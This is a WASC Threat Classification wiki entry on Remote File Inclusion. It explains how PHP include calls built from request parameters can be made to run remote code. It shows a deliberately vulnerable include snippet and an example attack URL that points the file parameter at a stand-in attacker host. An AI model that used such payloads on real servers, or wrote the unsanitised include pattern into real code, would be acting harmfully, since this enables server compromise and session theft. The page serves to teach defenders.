View
 

Remote File Inclusion

Page history last edited by Robert Auger 14 years, 11 months ago

Project: WASC Threat Classification

Threat Type: Attack

Reference ID: WASC-05

 

Remote File Inclusion

Remote File Include (RFI) is an attack technique used to exploit "dynamic file include" mechanisms in web applications. When web applications take user input (URL, parameter value, etc.) and pass them into file include commands, the web application might be tricked into including remote files with malicious code.

 

Almost all web application frameworks support file inclusion. File inclusion is mainly used for packaging common code into separate files that are later referenced by main application modules. When a web application references an include file, the code in this file may be executed implicitly or explicitly by calling specific procedures. If the choice of module to load is based on elements from the HTTP request, the web application might be vulnerable to RFI.

An attacker can use RFI for:

 

  • Running malicious code on the server: any code in the included malicious files will be run by the server. If the file include is not executed using some wrapper, code in include files is executed in the context of the server user. This could lead to a complete system compromise.
  • Running malicious code on clients: the attacker's malicious code can manipulate the content of the response sent to the client. The attacker can embed malicious code in the response that will be run by the client (for example, Javascript to steal the client session cookies).

 

PHP is particularly vulnerable to RFI attacks due to the extensive use of "file includes" in PHP programming and due to default server configurations that increase susceptibility to an RFI attack ([4,5]).

 

Example

Typically, RFI attacks are performed by setting the value of a request parameter to a URL that refers to a malicious file. Consider the following PHP code:

$incfile = $_REQUEST["file"];
include($incfile.".php");

 

The first line of code extracts the value of the file parameter from the HTTP request. The second line of code dynamically sets the file name to be included using the extracted value. If the web application does not properly sanitize the value of the file parameter (for example, by checking against a white list) this code can be exploited. Consider the following URL:

 

http://www.target.com/vuln_page.php?file=http://www.attacker.com/malicous

 

In this case the included file name will resolve to:

http://www.attacker.com/malicous.php

Thus, the remote file will be included and any code in it will be run by the server.

In many cases, request parameters are extracted implicitly (when the register_globals variable is set to On). In this case the following code is also vulnerable to the same attack:

 

include($file.".php");

 

Other PHP commands vulnerable to RFI are include_once, fopen, file_get_contents, require and require_once. Additional information on PHP environment variable behavior can be found at [4].

 

References:

Shaun Clowes, "A Study In Scarlet, Exploiting Common Vulnerabilities in PHP Applications", Blackhat Briefings Asia 2001

[1] http://www.securereality.com.au/studyinscarlet.txt

 

"Malicious File Inclusion" – OWASP Top 10

[2] http://www.owasp.org/index.php/Top_10_2007-A3

 

"Cafelog B2 Blog B2Verifauth.PHP Remote File Include Vulnerability"

[3] http://www.securityfocus.com/bid/21749/info

 

"PHP Runtime Configuration"

[4] http://php.net/manual/en/filesystem.configuration.php

 

"PHP Register Globals"

[5] http://php.net/register_globals

 

"Remote File Inclusion" - Wikipedia

[6] http://en.wikipedia.org/wiki/Remote_File_Inclusion

 

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')

[7] http://cwe.mitre.org/data/definitions/98.html

Comments (0)

You don't have permission to comment on this page.